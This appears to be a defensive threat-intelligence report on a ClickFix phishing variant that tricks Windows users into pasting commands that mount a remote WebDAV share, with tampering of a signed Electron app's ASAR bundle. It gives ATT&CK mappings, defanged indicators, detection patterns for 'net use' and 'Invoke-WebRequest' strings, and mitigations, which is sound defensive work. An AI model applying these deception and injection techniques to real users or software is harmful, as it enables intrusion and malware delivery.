Full Report
Disclaimer: This report has been prepared by the Threat Research Center to enhance cybersecurity awareness and support the strengthening of defense capabilities. It is based on independent research and observations of the current threat landscape available at the time of publication. The content is intended for informational and preparedness purposes only. Read more blogs around threat
Analysis Summary
# Tool/Technique: Click-Fix (Net Use Variant)
## Overview
This is a sophisticated evolution of the "Click-Fix" (also known as "ClearFake") social engineering technique. Attackers trick users into executing malicious commands via the Windows Run dialog (`Win + R`) by posing as a website fix or CAPTCHA verification. This specific variant distinguishes itself by using SMB/WebDAV to map a remote drive and utilizing modified Electron application bundles to hide malicious logic.
## Technical Details
- **Type:** Technique / Malware Dropper
- **Platform:** Microsoft Windows
- **Capabilities:** Social engineering, remote drive mapping, defense evasion via legitimate binaries, C2 beaconing, and payload dropping.
- **First Seen:** January 2026 (C2 registration); Report published March 13, 2026.
## MITRE ATT&CK Mapping
- **TA0001 - Initial Access**
- T1566.002 - Phishing: Spearphishing Link
- **TA0002 - Execution**
- T1204.002 - User Execution: Malicious File
- T1059.001 - Command and Scripting Interpreter: PowerShell
- T1059.003 - Command and Scripting Interpreter: Windows Command Shell
- **TA0005 - Defense Evasion**
- T1027 - Obfuscated Files or Information (ASAR injection)
- T1218 - System Binary Proxy Execution (WorkFlowy.exe)
- **TA0011 - Command and Control**
- T1071.001 - Application Layer Protocol: Web Protocols
## Functionality
### Core Capabilities
- **Manipulated Execution:** Leverages the Windows Run dialog (`Win + R`) and clipboard pasting to bypass browser security controls and prompt-based warnings.
- **Remote Drive Mounting:** Uses `net use` to connect to a remote WebDAV server (`https[:]//94.156.170[.]255/webdav`), allowing the local execution of scripts hosted on the attacker's infrastructure.
- **Automated Cleanup:** The initial command includes a `net use /delete` instruction to remove the mapped drive immediately after the secondary script is launched, reducing the forensic footprint.
### Advanced Features
- **Electron Application Hijacking:** Instead of a standard PE malware file, the attack uses a legitimate, signed version of the "WorkFlowy" desktop app.
- **ASAR Injection:** Attackers modified the `main.js` file inside the `app.asar` archive. Because the primary executable is signed and legitimate, it frequently bypasses Endpoint Detection and Response (EDR) solutions.
- **Persistence/Identification:** Creates a victim identifier file at `%APPDATA%\id.txt`.
## Indicators of Compromise
- **File Hashes (ZIP/Payload):** (Note: Specific hashes for the modified `app.asar` were not provided in the text; researchers should look for modified Electron bundles.)
- **File Names:**
- `update.cmd`
- `flowy.zip`
- `id.txt`
- **Network Indicators:**
- `happyglamper[.]ro` (Phishing Landing Page)
- `94.156.170[.]255` (WebDAV and File Hosting)
- `cloudflare[.]report/forever/e/` (C2 Domain)
- `144[.]31[.]165[.]173` (C2 Origin IP)
- `play2go[.]cloud` (Associated Infrastructure)
- **Behavioral Indicators:**
- Execution of `net use` with HTTPS URLs in the command line.
- Unexpected creation of subdirectories in `%LOCALAPPDATA%\MyApp\`.
- Modification of the `RunMRU` registry key containing `net use` or `powershell` commands.
## Associated Threat Actors
- While specific group names were not explicitly linked, this technique is a direct evolution of the TTPs used by groups operating **ClearFake** or **ClickFix** campaigns.
## Detection Methods
- **Behavioral Detection:** Monitor for instances of `cmd.exe` or `powershell.exe` being spawned directly from `explorer.exe` (via the Run dialog) containing the string "net use" or "Invoke-WebRequest".
- **Registry Monitoring:** Audit changes to the `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU` key for suspicious PowerShell or CMD strings.
- **Network-Based Detection:** Alert on WebDAV traffic (typically over port 443) redirected to non-standard external IP addresses.
## Mitigation Strategies
- **User Education:** Train users to never paste and execute commands provided by websites claiming to "fix" browser errors or CAPTCHAs.
- **Host Hardening:** Restrict the use of the `net.exe` and `net1.exe` utilities for standard users where possible.
- **PowerShell Constrained Language Mode:** Implement CLM to limit the effectiveness of malicious PowerShell scripts.
- **ASAR Integrity:** Employ application control policies that validate the integrity of internal application resources, not just the primary `.exe`.
## Related Tools/Techniques
- **ClearFake:** The predecessor tactic involving fake browser update overlays.
- **MSHTA Smuggling:** Previous Click-Fix versions utilized `mshta.exe` to execute remote HBA files.
- **App-Hopping:** Using legitimate signed Electron apps to proxy malicious code (similar to DLL Side-Loading).